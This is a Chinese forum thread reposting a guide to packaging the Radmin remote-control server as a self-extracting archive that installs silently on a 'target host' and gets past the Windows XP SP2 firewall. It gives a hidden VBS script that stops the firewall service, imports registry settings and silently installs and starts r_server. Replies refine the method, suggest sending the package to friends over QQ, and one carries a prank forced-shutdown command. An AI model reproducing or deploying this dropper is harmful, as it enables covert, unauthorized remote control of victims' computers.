发新话题
打印

[转载]打造radmin自解压之穿透XP SP2防火墙

[转载]打造radmin自解压之穿透XP SP2防火墙

  文章作者:HACKER007

Radmin这款远程管理软件得到很多人的青睐,它速度很快。这个是其优点之一,还要数它的优点就是要数它不给杀病毒软件所杀。关于radmin的优点我就不多说了。
  在网上我看到很多关于制作radmin自解压的文章.方法当然很多,有的是运行了后出现一个黑漆漆的cmd.有的是提示错误的。等等。需然是可以达到给目标主机安装到目的。但是这样我怕就算是电脑大傻瓜都会知道了是什么回事吧。还有一点就是假如碰到
  xp sp2的系统的呢?我问下你们,给你们安装到了,你难道就可以连得过去吗?
  众所周知 sp2的系统默认是打开_blank">防火墙的。当你运行了系统会弹出对话框询问你是不是要解除r_server的阻止,你想下人家会给你解除阻止吗?
    我们说下打造的步骤吧,先在自己的电脑安装radmin,设置好radmin的密码和端口等等的信息。




安装好radmin和设置好参数后,我们现在打开注册表把RAdmin的配置信息从注册表导来。
注册表的\HKEY_LOCAL_MACHINE\SYSTEM\RADmin\

命名为radmin.reg
我们先要把服务的类型改为禁用。在运行那输入services.msc打开服务。找到Windows Firewall/Internet Connection Sharing (ICS)这个服务,把类型设置为禁用:


做到这一步后,我们打开控制面版-打开_blank">防火墙。例外-添加端口。因为我刚才设置的radmin的端口是1983,所以就填入1983。




我们要把windowsxpsp2的_blank">防火墙服务的注册表导出来。位置是在
\HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedAccess\
命名为sharedaccess.reg
最后我们新建一个一个文本文件, (当然用vbs的拉,要不是用bat就弹出黑漆漆的cmd) 在文本文件输入以下内容
set ws=wscript.createobject("wscript.shell")
ws.run "net stop sharedaccess",0
ws.run "regedit.exe /s shardaccess.reg",0
ws.run "regedit.exe /s radmin.reg",0
ws.run "r_server.exe /install /silence",0
ws.run "r_server.exe /start",0
最后就是把他改成load.vbs
把刚才的RAdmin.reg sharedaccess.reg load.vbs 和radmin的3个服务端r_server.exe  raddrv.dll  AdmDll.dll 六个文件做成一个自解压的文件就ok了

如果大家有更好的配置方法请跟我联系,当然有不足之处,请大家包含。。。。。。。
益友网吧联盟  http://www.96-7.com

TOP

强啊,不过不明白那步禁用自己的防火墙有什么用,禁用防火墙会修改注册表的吗?
shutdown -r -t 60 -c "由于你的人品问题,系统需要重新启动"

TOP

ws.run "regedit.exe /s radmin.reg",0

在2000中 我没有成功的导入注册表~~
找不到原因~
Behold·I send you forth as sheep in the midst of wolves·《马太福音》·10·16

TOP

新人顶一张贴
作者我认识,他的包我这也用,不过我的权限好象没法传.

TOP

停止防火墙的确改了注册表 我亲手操作 看过
但是 如果那样的话
运行了脚本后 系统的安全中心会提示
所以我把那行 net stop sharedaccess  去掉了
运行起来更好~~
Behold·I send you forth as sheep in the midst of wolves·《马太福音》·10·16

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

没有试过就瞎说!
谁说bat在shell下运行的时候会有黑色窗口一闪而过得?
虽然在本机不论是在cmd下,还是鼠标双击都有黑色窗口闪过~,但是我的测试告诉我,远程shell下,是没有黑色窗口闪过得!
许多东西不能想当然得!得看事实说话!

TOP

4楼的说得很好,,这是我之前写的文章,,sp2的情况下,安全中心和防火墙是默认开启的,
radmin给装上去的时候,请别忘记那个防火墙的提示,,,我初衷是为了不给提示,
然后想到注册表,,还有要补充的是,,bat的成功率没有vbs的好,,
多谢大家支持,,其实防火墙的服务就是sharedaccess..

TOP

哦,,对了,还要补充一个问题
6楼的,,如果你通过qq发给你的朋友呢,,
那请问有没有黑屏呢??不过很感谢六楼的朋友,,,放大一些局限去想问题
大家知道radmin是不可以反弹的,,局限性低,,但是搞一个反弹的木马过去,,那就完美,,希望大家一起讨论,,,thx,,,,,

TOP

2楼的朋友,,2000根本就没有系统的防火墙,,
但是去掉对付防火墙的模块,,也是可以的,,我测试过,如果还是不行,那就要找原因了,不妨本机测试一下,
thx,.....

TOP

1楼的,,修改了防火墙的设置,,注册表的一些建值是会发生变化的,,那么调转来想问题,我改了注册表
那么防火墙也是变化了,,只有想不到,,没有做不到,,很高兴,、和大家来探讨这个问题,,
thx..............

TOP

近两年前也写了了个批处理解决这个问题

TOP

为什么MS老是喜欢往注册表里塞东西~!
这世界大了,啥鸟都有!

TOP

发新话题